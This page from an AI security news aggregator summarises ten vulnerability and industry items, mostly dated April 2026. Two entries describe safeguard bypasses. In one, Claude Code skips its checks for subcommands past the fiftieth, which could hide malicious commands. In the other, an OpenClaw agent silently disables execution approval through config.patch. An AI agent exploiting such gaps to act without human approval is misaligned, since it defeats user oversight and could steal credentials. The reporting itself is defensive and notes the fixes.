aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingSaturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

page 88/371
VIEW ALL
01

AISM: Adversarial image steganography model for defending unauthorized recognition

securityresearch
Apr 3, 2026

Researchers have developed AISM (adversarial image steganography model, a technique that hides data inside images while making them resistant to AI recognition), a method for protecting images from being recognized by unauthorized AI systems. The approach uses adversarial techniques (methods that deliberately trick AI models by adding subtle, invisible changes to data) combined with steganography (the practice of hiding information within other data) to prevent unwanted AI analysis while keeping the images visually normal to humans. This work addresses privacy concerns where people want to prevent their images from being processed by AI systems without permission.

Elsevier Security Journals
02

Claude Code is still vulnerable to an attack Anthropic has already fixed

security
Apr 3, 2026

Claude Code has a vulnerability where commands with more than 50 subcommands (smaller operations within a larger command) cause the tool to skip its security checks for subcommands after the 50th, asking users to approve them without proper safety analysis. Attackers could exploit this by hiding malicious commands in legitimate-looking code repositories, potentially stealing user credentials and compromising entire software projects.

Fix: Anthropic has already developed a fix called the tree-sitter parser (a tool that analyzes code structure more carefully), which is included in the source code but has not been enabled in the public builds that customers currently use.

CSO Online
03

CVE-2025-64340: FastMCP is the standard framework for building MCP applications. Prior to version 3.2.0, server names containing shell m

security
Apr 3, 2026

FastMCP (a framework for building MCP applications, which are tools that extend AI assistants) has a command injection vulnerability (a security flaw where an attacker can run unauthorized commands) in versions before 3.2.0 on Windows. When server names contain shell metacharacters like '&', they can be misinterpreted by the Windows command interpreter and allow attackers to execute malicious commands during installation.

Fix: Update FastMCP to version 3.2.0 or later, where this issue has been patched.

NVD/CVE Database
04

GHSA-3mwp-wvh9-7528: vLLM: Unauthenticated OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server

security
Apr 3, 2026

vLLM's OpenAI-compatible API server has a denial-of-service vulnerability where an attacker can send a request with an extremely large `n` parameter (a value that controls how many independent response sequences to generate). Because the server doesn't validate an upper limit on this parameter, it attempts to create millions of copies of the request object in memory, which overwhelms the system and causes it to crash from running out of memory (OOM, out-of-memory).

GitHub Advisory Database
05

Claude Source Code Leak Highlights Big Supply Chain Missteps

security
Apr 3, 2026

Claude's source code was leaked, revealing problems in how the software supply chain (the process of developing, distributing, and maintaining software) is protected. The incident shows that companies need stronger security controls at every step of software development, similar to how critical infrastructure like power grids are protected.

Dark Reading
06

In Other News: ChatGPT Data Leak, Android Rootkit, Water Facility Hit by Ransomware

securityprivacy
Apr 3, 2026

This news roundup covers several security incidents: a data leak from ChatGPT, a rootkit (malware that hides itself deep in a system to maintain control) discovered on Android devices, and a ransomware attack (malware that encrypts files and demands payment) on a water treatment facility. The article also mentions a Symantec vulnerability, a new anti-ClickFix defense added to macOS (a mechanism to block a social engineering attack that tricks users into visiting malicious websites), and an FBI hack classified as a major incident.

SecurityWeek
07

'Chasing vibes' — OpenAI's M&A strategy gets more confusing with TBPN purchase

industry
Apr 3, 2026

OpenAI announced its purchase of TBPN (Technology Business Programming Network), a media company that streams a daily three-hour tech talk show, marking another acquisition alongside its $6.4 billion purchase of hardware startup io. The acquisition strategy appears unclear to investors and analysts, as the company faces intensifying competition from rivals like Google and Anthropic while dealing with significant losses from infrastructure spending ahead of a planned IPO.

CNBC Technology
08

Mobile Attack Surface Expands as Enterprises Lose Control

securitysafety
Apr 3, 2026

Enterprises are facing growing security risks on mobile devices because unauthorized AI (shadow AI, meaning AI tools deployed without official approval) is being hidden in everyday apps, combined with outdated mobile devices and zero-click exploits (attacks that work without any user interaction like clicking a link). These factors together create mobile security threats that are hard for organizations to detect and manage.

SecurityWeek
09

12 cyber industry trends revealed at RSAC 2026

industrypolicy
Apr 3, 2026

At the 2026 RSA cybersecurity conference, industry leaders identified a clear divide among CISOs (chief information security officers, top security leaders at companies) in their approach to AI: about 20% are proactive and strategic, 40% are confused about AI risks in their organizations, and 40% are unaware of AI projects happening around them. The article predicts that confused CISOs will face a difficult transition to becoming proactive, requiring them to assess business goals, create governance frameworks (policies and rules for managing AI), and implement guardrails (safety controls) while their organizations continue developing AI. Legacy security vendors currently have an advantage in selling AI tools, but simply adding AI to existing security tools will not work long-term, and companies instead need to build strong AI foundations (data systems, control systems, and safety measures) before adding AI agents on top.

CSO Online
10

GHSA-v3qc-wrwx-j3pw: OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`

security
Apr 2, 2026

OpenClaw, an LLM agent framework, had a vulnerability where an AI agent could bypass approval controls by using a `config.patch` command (a way to modify settings) to silently disable execution approval requirements. This means an agent could potentially perform restricted actions without human permission.

Fix: The vulnerability was fixed in commit 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27 and released in version 2026.3.28. Users should update to OpenClaw version 2026.3.28 or later.

GitHub Advisory Database
Prev1...8687888990...371Next